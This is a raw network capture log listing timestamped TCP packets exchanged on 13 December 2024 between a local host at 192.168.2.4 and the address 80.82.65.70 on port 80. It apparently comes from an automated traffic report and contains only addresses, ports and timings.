                                          Dec 13, 2024 08:35:58.907213926 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:00.943149090 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:01.063254118 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:01.433620930 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:01.433792114 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:03.459718943 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:03.632667065 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:03.980022907 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:03.980117083 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:06.007148981 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:06.126988888 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:06.491027117 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:06.491215944 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:08.521539927 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:08.641423941 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:09.011677027 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:09.011759996 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:11.037185907 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:11.158447981 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:11.525727034 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:11.525814056 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:13.553316116 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:13.673206091 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:14.085191011 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:14.085685968 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:16.115699053 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:16.235579014 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:16.612184048 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:16.612490892 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:18.647279024 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:18.767127037 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:19.137053967 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:19.137118101 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.162498951 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.163008928 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.282726049 CET804973680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:21.282871008 CET4973680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.283190012 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:21.283304930 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.283587933 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:21.403541088 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:22.623142004 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:22.623321056 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.646616936 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.647301912 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.767656088 CET804974480.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:24.767774105 CET4974480192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.767844915 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:24.768013000 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.768309116 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:24.888135910 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:26.105125904 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:26.105242014 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:28.771296024 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:28.891621113 CET804975580.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:28.891953945 CET4975580192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.181232929 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.301245928 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:29.301347017 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.301923037 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:29.421742916 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791419983 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791452885 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791465044 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791517019 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791546106 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791565895 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791578054 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791589975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791600943 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791610003 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791630983 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791841030 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791851997 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791863918 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.791881084 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.791908979 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.911623955 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.911658049 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.911700964 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.911737919 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.983545065 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.983620882 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.983629942 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.983927011 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.987787008 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.987854958 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.987936020 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.988117933 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.996083975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.996155024 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:30.996211052 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:30.996452093 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.004456043 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.004561901 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.004565954 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.004614115 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.012980938 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.013035059 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.013082027 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.013267040 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.021275997 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.021317959 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.021337032 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.021357059 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.029730082 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.029788017 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.029808998 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.029860973 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.038060904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.038152933 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.038160086 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.038199902 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.046471119 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.046538115 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.046658993 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.046700001 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.054886103 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.054977894 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.055008888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.055192947 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.062503099 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.062568903 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.062669039 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.176426888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.176465034 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.176523924 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.176572084 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.178939104 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.179008007 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.179049015 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.179279089 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.183938980 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.184001923 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.184037924 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.184227943 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.189052105 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.189112902 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.189141035 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.189191103 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.194051981 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.194148064 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.194169998 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.194214106 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.198766947 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.198931932 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.199002028 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.203716040 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.203775883 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.203850985 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.208409071 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.208513975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.208668947 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.213191986 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.213284969 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.213361979 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.218153954 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.218204975 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.218286991 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.222785950 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.222906113 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.222974062 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.227659941 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.227798939 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.227869987 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.232458115 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.232508898 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.232575893 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.237205982 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.237349987 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.237425089 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.242019892 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.242130995 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.242197037 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.246823072 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.246982098 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.247072935 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.251619101 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.251712084 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.251770973 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.256406069 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.256531000 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.256597996 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.261214972 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.261334896 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.261399031 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.266110897 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.266189098 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.266220093 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.266272068 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.270828962 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.274329901 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.368453026 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.368474960 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.368535042 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.369582891 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.369647980 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.369692087 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.373588085 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.373791933 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.373822927 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.373847961 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.377610922 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.377661943 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.377703905 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.377743006 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.381649971 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.381751060 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.381781101 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.381795883 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.385654926 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.385698080 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.385727882 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.385756969 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.389424086 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.389508009 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.389535904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.389781952 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.393001080 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.393071890 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.393165112 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.393373013 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.396680117 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.396729946 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.396804094 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.396843910 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.400291920 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.400378942 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.400410891 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.400430918 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.403757095 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.403848886 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.403892994 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.404195070 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.407449007 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.407461882 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.407526016 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.410943985 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.410993099 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.411015987 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.411106110 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.414539099 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.414633989 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.414647102 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.414690971 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.418157101 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.418253899 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.418282032 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.418315887 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.421613932 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.421746969 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.421848059 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.425199986 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.425262928 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.425343990 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.425442934 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.428848028 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.428942919 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.429042101 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.429280996 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.432333946 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.432414055 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.432502031 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.432542086 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.435879946 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.435959101 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.436024904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.436065912 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.439507961 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.439573050 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.439578056 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.439610004 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.443015099 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.443113089 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.443133116 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.443161964 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.446589947 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.446647882 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.446683884 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.446722984 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.450146914 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.450202942 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.450263023 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.450493097 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.453720093 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.453803062 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.453896046 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.457215071 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.457293987 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.560723066 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.560859919 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.561021090 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.562274933 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.562376022 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.562484026 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.562530041 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.565020084 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.565165997 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.565222025 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.567728043 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.567842960 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.567990065 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.570475101 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.570621967 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.570676088 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.573282957 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.573426962 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.573499918 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.575949907 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.576184988 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.576234102 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.578545094 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.578670025 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.578747034 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.581219912 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.581286907 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.581322908 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.582309008 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.583709955 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.583781958 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.583812952 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.583852053 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.586294889 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.586410046 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.586460114 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.588870049 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.588954926 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.589014053 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.591466904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.591628075 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.591679096 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.593961000 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.594158888 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.594214916 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.596479893 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.596533060 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.596741915 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.596781015 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.599060059 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.599176884 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.599222898 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.601609945 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.601718903 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.601763964 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.604207993 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.604317904 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.604363918 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.606775045 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.606853008 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.606923103 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.609277964 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.609324932 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.609392881 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.610304117 CET4976680192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:31.611845016 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.611910105 CET804976680.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:31.611952066 CET4976680192.168.2.480.82.65.70
